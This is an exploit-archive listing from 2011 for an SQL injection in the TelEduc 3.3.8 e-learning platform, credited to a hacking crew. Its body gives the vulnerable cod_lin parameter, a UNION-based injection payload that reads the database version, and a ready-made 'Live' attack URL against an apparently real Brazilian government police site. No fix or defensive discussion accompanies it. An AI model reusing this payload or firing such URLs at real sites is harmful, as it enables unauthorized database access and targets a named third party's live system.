TelEduc 3.3.8 SQL Injection



EKU-ID: 496 CVE: OSVDB-ID:
Author: s4r4d0 Published: 2011-06-13 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# By s4r4d0 - 2011 � # Made in Brazil 
#########################################################################
# TelEduc Version 3.3.8
######################################################################### 
# Name: TelEduc Version 3.3.8 ( SQL Injection Vulnerability ) 
# Download: http://www.teleduc.org.br/pagina/download-teleduc/ 
# Date: 12/06/2011 
# Author: s4r4d0 
# E-mail: s4r4d0[at]yhaoo[dot]com 
# Team: Fatal Error 
# Twitter: www.twitter.com/fatalerrorcrew 
================================================================================
================================================================================ 
[#] vuln:
http://www.example.com.br/~teleduc/pagina_inicial/index.php?cod_lin=[SQLi] 

[#] Exploit: 
-9999 union select 1,@@version-- 

[#] Live:
http://www.eadpm.polmil.sp.gov.br/~teleduc/pagina_inicial/index.php?cod_lin=-9999 union select 1,@@version-- 
================================================================================
================================================================================